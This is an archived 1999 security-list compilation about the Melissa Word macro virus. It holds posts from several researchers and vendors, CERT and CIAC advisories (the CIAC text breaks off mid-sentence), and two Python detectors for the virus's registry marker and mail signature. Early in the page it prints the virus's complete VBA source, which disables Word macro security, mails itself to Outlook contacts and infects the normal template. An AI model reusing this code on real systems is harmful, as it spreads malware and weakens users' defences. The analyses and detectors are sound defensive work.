melissa.macro.virus.txt
Posted Aug 17, 1999

I am not going to make a habit of posting virus alerts, but this analysis of the fast spreading Melissa virus, including full source code, merits a posting. Excellent job by Nate Lawson of root.org.

tags | exploit, root, virus
MD5 | 5fe5025944f1b46cfb6e77027470049e

Date: Fri, 26 Mar 1999 17:05:51 -0800
From: Aleph One <aleph1@UNDERGROUND.ORG>
To: BUGTRAQ@netspace.org
Subject: Melissa Macro Virus

I normally don't allow virus posts through the list as they seldom represent
a new threat, just a new example of an already existing one, but this one
is getting enough play to warrant a message.

There is a new Word macro virus circulating called Melissa. The virus
propagates via email. Attached to the email is a Word file that when
opened will launch a macro that will send the same message to the first
50 recipients of your Outlook address book. The subject line is
"important Message From <some user name>". The body consists of the text
"Here is that document you asked for... don't show anyone else;-)".
The infected document contains passwords to porn web sites.

For more information check out: http://vil.mcafee.com/vil/vm10120.asp

As this thing is emailing itself to everyone under the sun virus vendors
should have no problem obtaining copies to analyze. If anyone wants a copy
send me a message.


--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 18:01:13 -0800
From: Nate Lawson <nate@ROOT.ORG>
To: BUGTRAQ@netspace.org
Subject: Melissa virus code

Sorry to add one more message to this. I placed the code up on my site,
formatted so that it is readable.

http://www.root.org/

-Nate

[http://www.root.org/melissa_virus.txt]

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If


Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If

If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If

If DoNT <> True And DoAD <> True Then GoTo CYA

If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

CYA:

If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If

'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 17:51:49 -0800
From: Nate Lawson <nate@ROOT.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Melissa Macro Virus

Here is my analysis of how the virus works. The McAfee article aleph1
posted neglects to mention that it infects the active document and
Normal.dot

1. Check for Word security controls and disable them:
    Word 2000
        Macro.Security... = FALSE
    Word 97
        Options.ConfirmConversions = 0
        Options.VirusProtection = 0
        Options.SaveNormalPrompt = 0

2. See if machine is already infected
    Check HKCU\Software\Microsoft\Office\Melissa? for the string "... by Kwyjibo"

3. If it wasn't already infected, go through the Outlook addressbook and
send mail to the first 50 names
    Subject: Important Message From <Full Name>
    Body: Here is that document you asked for... don't show anyone else ;-)
    Attachment: itself, named "list.doc"

After sending the mail, add the registry key to disable further
infection.

4. Open the Active Document and Normal.dot and infect them with itself

5. On the way out, check if the current day equals the current minute.
If so, print "Twenty-two points, plus triple-word-score, plus fifty points
for using all my letters. Game's over. I'm outta here."

It does not appear to do anything malicious other than shutting down your
mail server with tons of mail as users start opening the attachment. It
appears the virus vendors have a patch out now. To avoid infection,
disable macros when opening any Word document or just don't open the
attachment. Thanks to Josh Siegel for sending me the code.

-Nate

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 19:00:35 -0800
From: "Kuo, Jimmy" <Jimmy_Kuo@NAI.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Melissa Macro Virus

Nate Lawson does a wonderful writeup to which I will make minor
clarifications:
>Here is my analysis of how the virus works. The McAfee article aleph1
>posted neglects to mention that it infects the active document and
>Normal.dot

[Hide face]
In all the clamor over the spreading aspect, we forgot to tell people that
it's a normal macro virus in all other means. And that if you don't have
Outlook, breathe calm. But if you do have Outlook, WATCH OUT!

"infects the active document" is redundant. It's infected. That's what
starts this.

>1. Check for Word security controls and disable them:
> Word 2000
> Macro.Security... = FALSE
> Word 97
> Options.ConfirmConversions = 0
> Options.VirusProtection = 0
> Options.SaveNormalPrompt = 0

>2. See if machine is already infected
> Check HKCU\Software\Microsoft\Office\Melissa? for the string "... by
>Kwyjibo"

>3. If it wasn't already infected, go through the Outlook addressbook and
>send mail to the first 50 names

First 50 names of every addressbook.

And the kicker? Look at the first 50 names in your address books? How many
mailing lists are there?

> Subject: Important Message From <Full Name>
> Body: Here is that document you asked for... don't show anyone else
>;-)

> Attachment: itself, named "list.doc"

This time. We have discovered that it was posted to alt.sex in a file named
LIST.ZIP.

> After sending the mail, add the registry key to disable further
>infection.

Disables future mailings. Infections can happen again. But the email blast
will happen only the first time, unless you clean the registry. So we
recommend that you do not remove that element of the registry.

>4. Open the Active Document and Normal.dot and infect them with itself

>5. On the way out, check if the current day equals the current minute.
>If so, print "Twenty-two points, plus triple-word-score, plus fifty points
>for using all my letters. Game's over. I'm outta here."

>It does not appear to do anything malicious other than shutting down your
>mail server with tons of mail as users start opening the attachment. It
>appears the virus vendors have a patch out now. To avoid infection,
>disable macros when opening any Word document or just don't open the
>attachment. Thanks to Josh Siegel for sending me the code.

Good ideas.

Jimmy Kuo
Director, AV Research, Network Associates
(or as he says, McAfee)
jkuo@nai.com

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 19:24:47 -0800
From: Aaron Wood <awood@CS.WASHINGTON.EDU>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: [BugTraq] Melissa Macro Virus (fwd)


On a lighter side...


MSNBC speculates as to the origin of the Hackers name.

"Kwyjibo appears to be a reference to a "Simpsons" TV show episode in
which Bart Simpson wins a Scrabble game by spelling out the word Kwyjibo.
The virus also includes a line from that episode: "Twenty-two points, plus
triple-word-score, plus fifty points for using all my letters. Game's over.
I'm outta here."


AW


-----Original Message-----
From: Dan Schrader [mailto:Dan_Schrader@trendmicro.com]
Sent: Friday, March 26, 1999 6:56 PM
To: 'Aaron Wood'; NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: RE: [BugTraq] Melissa Macro Virus (fwd)


This is a serious event. A number of major companies - including Microsoft
and Intel - have told the press that they had to temporarily shut down their
e-mail systems due to this virus. At least 25 major companies have
contacted Trend Micro about this today alone.

Trend Micro has a free tool for scanning your exchange servers to ensure
that they are not harboring any infected documents. The tool, called
HouseCall for Microsoft Exchange is available at:

http://housecall.antivirus.com/smex_housecall/

This detects, but does not cure infected files. HouseCall for Exchange is
an ActiveX Control - so you need Microsoft IE with security settings set to
medium or low to run it. Considering this audience, I suspect you will want
to remember to set those settings back when you are done.

Trend also offers a tool for scanning individual machines
http://housecall.antivirus.com

Virus Description:

This virus works with both Word 97 and Word 2000 and the macro activates
when an infected document is closed. If it is activated in Word 2000, it
will lower the security setting to the lowest level by modifying the
registry and will disable the Word menu commands (Macro\Security) which
allows the user to reinstate security settings. In Word97, the virus
disables the Tools/Macro menu commands, the Confirm Conversions option, the
MS Word macro virus protection, and the Save Normal Template prompt. The
virus then checks to see if the registry key
"HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa?" contains the value
". . . by Kwyjibo." This is how the virus determines whether it has
activated on this system.

The virus then opens Outlook, if present on the system, and sends one email
for each address list. The email may contain up to 50 recipients. The email
will contain the subject line: "Important Message From {user name}" and the
message body will be "Here is that document you asked for . . . don't show
anyone else :-)" The virus then attaches a copy of the infected active
document to the outgoing mail. The name of the original infected attachment
was List.doc, but it could be any name.

If the user does not have Outlook, the virus will not work. Then the virus
modifies the value of the registry key mentioned above so it is equal to
". . . by Kwyjibo" -- indicating that it has successfully activated on this
computer. After that, the virus checks to see if the normal template and
active document are infected, and if either is not, it infects the file.
Finally, if the day of the month is equal to the minute (for example, if it
is March 26 at 3:26 pm), the virus will type the following text on the
active document: "Twenty-two points, plus triple-word-score, plus fifty
points for using all my letters. Game's over. I'm outta here."

Trend Micro has detection for this virus in its latest pattern update,
"510". Users are encouraged to download and install this latest pattern
update. The protection will also be included in the regular weekly update.

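Dan Schrader's description above, like Nate Lawson's analysis and the virus source earlier on this page, names the two registry changes the macro makes: the `Melissa?` marker under HKEY_CURRENT_USER\Software\Microsoft\Office and the Word 2000 macro security Level lowered to 1 (Low). The Python below is an added example written for this page, not code from Trend Micro or any of the posters; it parses a Regedit export (the text `reg export` / Regedit produce) offline and reports both indicators, so a responder can triage a collected export without touching the live machine. The two sample exports are constructed, and the stored value types (a string for the marker, a DWORD for Level) are assumptions about how Word writes them.

```python
"""Offline triage of a Regedit (.reg) export for the registry changes Melissa makes.

Added example for this page; not from any of the posts above. Key paths come
from the virus source on this page. Sample exports are constructed.
"""
import re
from typing import Dict, Optional, Tuple

MARKER_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Office"
MARKER_NAME = "Melissa?"
MARKER_VALUE = "... by Kwyjibo"
SECURITY_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
SECURITY_NAME = "Level"
LEVEL_NAMES = {1: "Low", 2: "Medium", 3: "High"}  # Word 2000 Tools/Macro/Security levels

_KEY_RE = re.compile(r"^\[(-?)([^\]]+)\]$")                 # [path] or [-path] (deletion)
_VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')  # "name"=value or @=value


def _unescape(s: str) -> str:
    """Undo the backslash escapes Regedit uses inside quoted strings (\\\\ and \\")."""
    return re.sub(r"\\(.)", r"\1", s)


def _decode_value(raw: str):
    """Decode a .reg value: quoted string -> str, dword:hex -> int, anything else kept raw."""
    raw = raw.strip()
    if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
        return _unescape(raw[1:-1])
    if raw.lower().startswith("dword:"):
        return int(raw[6:], 16)
    return raw  # hex:... binary blobs and continuation lines are not needed here


def parse_reg_export(text: str) -> Dict[Tuple[str, str], object]:
    """Map (key path, value name) -> decoded value.

    Registry names are case-insensitive, so both parts of the key are lower-cased.
    """
    values: Dict[Tuple[str, str], object] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = _KEY_RE.match(line)
        if m:
            current = None if m.group(1) else m.group(2).lower()
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name = _unescape(m.group(1)) if m.group(1) is not None else ""  # "@" = default value
            values[(current, name.lower())] = _decode_value(m.group(2))
    return values


def melissa_findings(reg_text: str) -> Dict[str, object]:
    """Report the infection marker and the Word 2000 macro security level."""
    values = parse_reg_export(reg_text)
    marker = values.get((MARKER_KEY.lower(), MARKER_NAME.lower()))
    level = values.get((SECURITY_KEY.lower(), SECURITY_NAME.lower()))
    if isinstance(level, str) and level.isdigit():  # tolerate a string-typed Level
        level = int(level)
    return {
        "marker_present": marker == MARKER_VALUE,
        "marker_value": marker,
        "security_level": LEVEL_NAMES.get(level, None if level is None else f"unknown({level})"),
        "macro_security_lowered": level == 1,
    }


# Constructed export: a profile where the macro has run (value types assumed).
SAMPLE_INFECTED_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office]
"Melissa?"="... by Kwyjibo"

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]
"Level"=dword:00000001
'''

# Constructed export: no marker, macro security still at High.
SAMPLE_CLEAN_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office]

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]
"Level"=dword:00000003
'''

if __name__ == "__main__":
    for label, export in (("infected", SAMPLE_INFECTED_REG), ("clean", SAMPLE_CLEAN_REG)):
        print(label, melissa_findings(export))
```

The marker alone says only that the macro ran at some point; as Jimmy Kuo notes above, it is also what stops the mail blast from repeating, so the report leaves the decision about removing it to the reader.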
----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 07:07:20 -0500
From: CERT Advisory <cert-advisory@cert.org>
Reply-To: cert-advisory-request@cert.org
To: cert-advisory@coal.cert.org
Subject: CERT Advisory CA-99.04 - Melissa Macro Virus

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-99-04-Melissa-Macro-Virus

Original issue date: Saturday March 27 1999
Last Revised: Saturday March 27, 1999

Systems Affected

* Machines with Microsoft Word 97 or Word 2000
* Any mail handling system could experience performance problems or
a denial of service as a result of the propagation of this macro
virus.

Overview

At approximately 2:00 PM GMT-5 on Friday March 26 1999 we began
receiving reports of a Microsoft Word 97 and Word 2000 macro virus
which is propagating via email attachments. The number and variety of
reports we have received indicate that this is a widespread attack
affecting a variety of sites.

Our analysis of this macro virus indicates that human action (in the
form of a user opening an infected Word document) is required for this
virus to propagate. It is possible that under some mailer
configurations, a user might automatically open an infected document
received in the form of an email attachment. This macro virus is not
known to exploit any new vulnerabilities. While the primary transport
mechanism of this virus is via email, any way of transferring files
can also propagate the virus.

Anti-virus software vendors have called this macro virus the Melissa
macro or W97M_Melissa virus.

I. Description

The Melissa macro virus propagates in the form of an email message
containing an infected Word document as an attachment. The transport
message has most frequently been reported to contain the following
Subject header

Subject: Important Message From <name>

Where <name> is the full name of the user sending the message.

The body of the message is a multipart MIME message containing two
sections. The first section of the message (Content-Type: text/plain)
contains the following text.

Here is that document you asked for ... don't show anyone else ;-)

The next section (Content-Type: application/msword) was initially
reported to be a document called "list.doc". This document contains
references to pornographic web sites. As this macro virus spreads we
are likely to see documents with other names. In fact, under certain
conditions the virus may generate attachments with documents created
by the victim.

When a user opens an infected .doc file with Microsoft Word97 or
Word2000, the macro virus is immediately executed if macros are
enabled.

Upon execution, the virus first lowers the macro security settings to
permit all macros to run when documents are opened in the future.
Therefore, the user will not be notified when the virus is executed in
the future.

The macro then checks to see if the registry key

"HKEY_Current_User\Software\Microsoft\Office\Melissa?"

has a value of "... by Kwyjibo". If that registry key does not exist
or does not have a value of "... by Kwyjibo", the virus proceeds to
propagate itself by sending an email message in the format described
above to the first 50 entries in every MAPI address book readable by
the user executing the macro. Keep in mind that if any of these email
addresses are mailing lists, the message will be delivered to everyone
on the mailing lists. In order to successfully propagate, the affected
machine must have Microsoft Outlook installed; however, Outlook does
not need to be the mailer used to read the message.

Next, the macro virus sets the value of the registry key to "... by
Kwyjibo". Setting this registry key causes the virus to only propagate
once per session. If the registry key does not persist through
sessions, the virus will propagate as described above once per every
session when a user opens an infected document. If the registry key
persists through sessions, the virus will no longer attempt to
propagate even if the affected user opens an infected document.

The macro then infects the Normal.dot template file. By default, all
Word documents utilize the Normal.dot template; thus, any newly
created Word document will be infected. Because unpatched versions of
Word97 may trust macros in templates the virus may execute without
warning. For more information please see:

http://www.microsoft.com/security/bulletins/ms99-002.asp

Finally, if the minute of the hour matches the day of the month at
this point, the macro inserts into the current document the message
"Twenty-two points, plus triple-word-score, plus fifty points for
using all my letters. Game's over. I'm outta here."

Note that if you open an infected document with macros disabled and
look at the list of macros in this document, neither Word97 nor
Word2000 list the macro. The code is actually VBA (Visual Basic for
Applications) code associated with the "document.open" method. You can
see the code by going into the Visual Basic editor.

If you receive one of these messages, keep in mind that the message
came from someone who is affected by this virus and they are not
necessarily targeting you. We encourage you to contact any users from
which you have received such a message. Also, we are interested in
understanding the scope of this activity; therefore, we would
appreciate if you would report any instance of this activity to us
according to our Incident Reporting Guidelines document available at:

http://www.cert.org/tech_tips/incident_reporting.html

II. Impact

* Users who open an infected document in Word97 or Word2000 with
macros enabled will infect the Normal.dot template causing any
documents referencing this template to be infected with this macro
virus. If the infected document is opened by another user, the
document, including the macro virus, will propagate. Note that
this could cause the user's document to be propagated instead of
the original document, and thereby leak sensitive information.

* Indirectly, this virus could cause a denial of service on mail
servers. Many large sites have reported performance problems with
their mail servers as a result of the propagation of this virus.

III. Solutions

* Block messages with the signature of this virus at your mail transfer
agents.

With Sendmail

Nick Christenson of sendmail.com provided information about
configuring sendmail to filter out messages that may contain the
Melissa virus. This information is available from the follow URL:
ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-melissa-filter.txt

* Utilize virus scanners

Most virus scanning tools will detect and clean macro viruses. In
order to detect and clean current viruses you must keep your
scanning tools up to date with the latest definition files.

+ McAfee / Network Associates

http://vil.mcafee.com/vil/vm10120.asp
http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp

+ Symantec

http://www.symantec.com/avcenter/venc/data/mailissa.html

+ Trend Micro

http://housecall.antivirus.com/smex_housecall/technotes.html

* Encourage users at your site to disable macros in Microsoft Word

Notify all of your users of the problem and encourage them to
disable macros in Word. You may also wish to encourage users to
disable macros in any product that contains a macro language as
this sort of problem is not limited to Microsoft Word.

In Word97 you can disable automatic macro execution (click
Tools/Options/General then turn on the 'Macro virus protection'
checkbox). In Word2000 macro execution is controlled by a security
level variable similar to Internet Explorer (click on
Tools/Macro/Security and choose High, Medium, or Low). In that
case, 'High' silently ignores the VBA code, Medium prompts in the
way Word97 does to let you enable or disable the VBA code, and
'Low' just runs it.

Word2000 supports Authenticode on the VB code. In the 'High'
setting you can specify sites that you trust and code from those
sites will run.

* General protection from Word Macro Viruses

For information about macro viruses in general, we encourage you
to review the document "Free Macro AntiVirus Techniques" by Chengi
Jimmy Kuo which is available at:

http://www.nai.com/services/support/vr/free.asp

Acknowledgements

We would like to thank Jimmy Kuo of Network Associates, Eric Allman
and Nick Christenson of sendmail.com, Dan Schrader of Trend Micro, and
Jason Garms and Karan Khanna of Microsoft for providing information
used in this advisory.

Additionally we would like to thank the many sites who reported this
activity.
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html.
______________________________________________________________________

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.

CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
Monday through Friday; they are on call for emergencies during other
hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email.
Our public PGP key is available from http://www.cert.org/CERT_PGP.key.
If you prefer to use DES, please call the CERT hotline for more
information.

Getting security information

CERT publications and other security information are available from
our web site http://www.cert.org/.

To be added to our mailing list for advisories and bulletins, send
email to cert-advisory-request@cert.org and include SUBSCRIBE
your-email-address in the subject of your message.

Copyright 1999 Carnegie Mellon University.
Conditions for use, disclaimers, and sponsorship information can be
found in http://www.cert.org/legal_stuff.html.

* "CERT" and "CERT Coordination Center" are registered in the U.S.
Patent and Trademark Office
______________________________________________________________________

NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software
Engineering Institute is furnished on an "as is" basis. Carnegie
Mellon University makes no warranties of any kind, either expressed or
implied as to any matter including, but not limited to, warranty of
fitness for a particular purpose or merchantability, exclusivity or
results obtained from use of the material. Carnegie Mellon University
does not make any warranty of any kind with respect to freedom from
patent, trademark, or copyright infringement.
______________________________________________________________________

Revision History

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNvy9H3VP+x0t4w7BAQG1ggP7B8ItzTRpkP2O8JK7olIOdmn072PIZZxE
mJDW+A9fLDvRZQlVDSsFz/aH8ivmhor5ZbvtT14OmfIZWvxYdFnbO/s2WYL7+fV5
jL6mSb4AJ6lRXIYii+t22V0lvqJdP6VRFqy9EibpMtU2dhgFYf3TKX5e6wajOmBx
bZ6Ef5jPilA=
=aABH
-----END PGP SIGNATURE-----

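Section III of the CERT advisory recommends blocking messages with the virus's signature at the mail transfer agent, and Section I (like Nate Lawson's analysis earlier) spells out what that signature is: the Subject header, the text/plain body line, and an application/msword attachment. The Python below is an added example written for this page, not code from CERT, sendmail.com or any of the posters; it parses RFC 822 messages with the standard library and requires all three traits before flagging, since the Subject or a Word attachment on its own is ordinary mail. The two sample messages, their addresses, and the MIME boundary are constructed placeholders.

```python
"""Offline detector for the Melissa transport message as described in CA-99-04.

Added example for this page; not from the advisory or any of the posts above.
The sample messages are constructed.
"""
from email import message_from_string, policy
from email.message import EmailMessage
from typing import Dict

SUBJECT_PREFIX = "important message from"            # "Important Message From <name>"
BODY_MARKER = "here is that document you asked for"  # "... don't show anyone else ;-)"
WORD_TYPES = {"application/msword", "application/vnd.ms-word"}


def melissa_traits(raw: str) -> Dict[str, bool]:
    """Return which of the three CA-99-04 traits a raw message exhibits."""
    msg: EmailMessage = message_from_string(raw, policy=policy.default)
    subject = (msg.get("Subject") or "").strip().lower()
    traits = {"subject": subject.startswith(SUBJECT_PREFIX), "body": False, "word_attachment": False}
    for part in msg.walk():
        if part.is_multipart():
            continue  # containers carry no content of their own
        ctype = part.get_content_type()
        if ctype == "text/plain":
            if BODY_MARKER in part.get_content().lower():
                traits["body"] = True
        elif ctype in WORD_TYPES or (part.get_filename() or "").lower().endswith(".doc"):
            traits["word_attachment"] = True
    return traits


def is_melissa_transport(raw: str) -> bool:
    """MTA block rule: all three traits together, which is what the advisory describes."""
    return all(melissa_traits(raw).values())


# Constructed sample shaped like the transport message in CA-99-04 Section I.
# The attachment payload is base64 of the word PLACEHOLDER, not a document.
SAMPLE_MELISSA = """\
From: Some User <user@example.invalid>
To: list@example.invalid
Subject: Important Message From Some User
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="us-ascii"

Here is that document you asked for ... don't show anyone else ;-)
--b1
Content-Type: application/msword; name="list.doc"
Content-Disposition: attachment; filename="list.doc"
Content-Transfer-Encoding: base64

UExBQ0VIT0xERVI=
--b1--
"""

# Constructed benign control: same Subject wording, ordinary body, no attachment.
SAMPLE_BENIGN = """\
From: Colleague <colleague@example.invalid>
To: you@example.invalid
Subject: Important Message From Colleague
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

The meeting moved to 3pm; see the calendar invite.
"""

if __name__ == "__main__":
    for label, raw in (("melissa-shaped", SAMPLE_MELISSA), ("benign", SAMPLE_BENIGN)):
        print(f"{label}: traits={melissa_traits(raw)} block={is_melissa_transport(raw)}")
```

Matching on header text only, as a sendmail rule must, catches this one message format; the advisory's own warning that the attachment name and even the document may change is why the body and attachment checks are kept separate and reported individually, so a filter can be loosened to Subject plus body if renamed attachments start appearing.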
----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 20:20:13 -0800
From: Jim Reavis <jreavis@SECURITYPORTAL.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Melissa Macro Virus

The one thing I would like to add is that the virus code actually walks
through every available address list and grabs 50 recipients off of each for
a separate message, so if your Outlook client is attached to an Exchange
Server, it will hit the Global Address List and other available containers,
where it may find large distribution lists.

I will shortly have my analysis up at http://securityportal.com/

Jim Reavis
SecurityPortal.com - The focal point for security on the Net
jreavis@SecurityPortal.com

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 12:45:38 -0800 (PST)
From: CIAC Mail User <ciac@rumpole.llnl.gov>
To: ciac-bulletin@rumpole.llnl.gov
Subject: CIAC Bulletin J-037: W97M.Melissa Word Macro Virus

[ For Public Release ]
-----BEGIN PGP SIGNED MESSAGE-----


__________________________________________________________

                       The U.S. Department of Energy
                    Computer Incident Advisory Capability
                           ___  __ __    _     ___
                          /       |     /_\   /
                          \___  __|__  /   \  \___
__________________________________________________________

INFORMATION BULLETIN

W97M.Melissa Word Macro Virus

March 27, 1999 17:00 GMT                                        Number J-037
_____________________________________________________________________________
PROBLEM:       A new Word 97 macro virus named W97M.Melissa has been detected
               at multiple DOE sites and is known to be spreading widely. The
               virus uses Microsoft Outlook to e-mail the infected document
               to the first 50 people from each of your Outlook address books.
PLATFORM:      Windows 95 or Windows NT running Microsoft Word 97 (version 8)
               or Word 2000 (version 9) and Microsoft Outlook. Word 98 on the
               Macintosh is probably not vulnerable because the virus uses
               the Windows registry, but that has not been verified yet.
               Outlook Express and other mail readers are not vulnerable.
DAMAGE:        It overwrites the first macro in open documents and in the
               normal.dot template with the macro virus code. It turns off
               macro detection in Word. It sends copies of the infected
               document to up to 50 people from each of your Outlook address
               books.
SOLUTION:      Use an updated antivirus product. Some vendors have a solution
               available but in many cases you must go to the vendor's web
               site to get it. Do not depend on the automatic or live update
               feature of an antivirus package to get the detector for this
               virus. Additional precautions are to password protect the
               normal.dot file, turn on macro virus detection in Word, and DO
               NOT OPEN attachments to mail messages with the subject
               "Important Message From " and the contents "Here is that
               document you asked for ... don't show anyone else ;-)" without
               checking with the sender. Alert your computer security
               officers if you receive such messages.
_____________________________________________________________________________
VULNERABILITY  Risk of infection is high. This virus is spreading widely
ASSESSMENT:    within and without of the DOE complex. The risk of damage to
               your system is low because most users do not have macros in
               files and would be alerted by Word's macro detector. The risk
               of lost productivity and lost mail messages is high as mail
               servers may have to be shut down and purged of infected mail
               messages.
_____________________________________________________________________________
CIAC has critical information about the W97M.Melissa Word Macro Virus

The W97M.Melissa Word macro virus has been seen within the DOE complex. This
macro virus attaches to Word objects in Word 97 and Word 2000. Because of
this method of infection, this virus will not infect older versions of
Microsoft Word. When an infected document is opened, the virus checks to
see if Word 97 or Word 2000 is installed and then disables the Macro
toolbar. It then disables the following Word options:

Confirm conversions at open.
Macro virus protection.
Prompt to save Normal template.

Disabling these options makes it difficult to detect the virus in action. The
virus next checks the value of the private registry string:

HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa?

If that string is not equal to "... by Kwyjibo" the virus sends copies of the
infected document to the first 50 people in each of your Outlook address
books and then sets the registry key so it does not do this again. It sends
copies of the infected document to others by opening a connection to Microsoft
Outlook and creating an e-mail message with the subject:

Important Message From <username>

where <username> is replaced with the current Word user's name (Tools, Options
command, User Information tab). The body of the message contains the following
text:

Here is that document you asked for ... don't show anyone else ;-)

The virus then inserts the first 50 users from your Outlook address book,
attaches the infected document and sends the message. It does this for however
many address books you have defined in Outlook.

After sending itself to the people in your address books, the virus then
checks to see if it is running on a document or the Normal.dot template. If
it is running on a document, it infects the Normal.dot template with a
Document_Close macro that runs whenever a document is closed. If it is
running on the Normal.dot template, it infects the active document with a
Document_Open macro that runs whenever a document is opened. After the
Normal.dot template is infected, the virus infects every document you work
on as soon as you close them. If you share these documents with anyone, you
will spread the virus.

Finally, if the minute of the hour equals the day of the month, the virus
inserts the following message at the current location in the active document.

Twenty-two points, plus triple-word-score, plus fifty points for using
all my letters. Game's over. I'm outta here.

Detecting The Virus
===================

Several antivirus vendors have a detection and cleaning capability for this
virus; however, you must go to the vendor's web site to get the scanner
updates. Scanners with automatic or live update features do not yet get the
update required to find and clean this virus. While we expect the detection
strings to be in the automatic updates in the near future, for the next
week or two you should get the scanner directly from your vendor's web site.
We have verified that the Norton Antivirus updater obtained from the
Symantec web site (http://www.symantec.com/techsupp/custom/mailissa.html)
